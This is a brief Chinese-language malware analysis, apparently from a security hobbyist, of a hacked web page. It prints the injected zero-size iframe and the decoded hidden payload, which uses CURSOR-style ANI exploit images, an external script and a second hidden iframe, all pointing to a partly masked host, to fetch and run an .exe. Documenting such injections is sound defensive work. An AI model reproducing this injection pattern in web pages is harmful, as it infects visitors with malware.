植入的代码为:
/--- <iframe src=hxxp://www.1**8d*m***m.com/d***m*/kehu0739.htm width=0 height=0> ---/
kehu0739.htm的内容所用代码为US-ASCII。
到 http://purpleendurer.ys168.com 下载 US-ASCII加密、解密程序 解密后得到的内容包含代码:
/--- <DIV id=new_content_jp style="DISPLAY: none"> <DIV style="CURSOR: url('hxxp://www.1**8d*m***m.com/wangma/39a.jpg')"> <DIV style="CURSOR: url('hxxp://www.1**8d*m***m.com/wangma/39b.jpg')"></DIV></DIV></DIV> <SCRIPT language=javascript src="hxxp://www.1**8d*m***m.com/wangma/39.js"></SCRIPT> <iframe src=hxxp://www.1**8d*m***m.com/wangma/061439.htm width=0 height=0></iframe> ---/
hxxp://www.1**8d*m***m.com/wangma/39a.jpg(Kaspersky 报为 Exploit.Win32.ImG-ANI.ac)和 39b.jpg 利用 ANI漏洞 下载Hxxp://1**8d*m***m.com/xi*a***/kehu0739.exe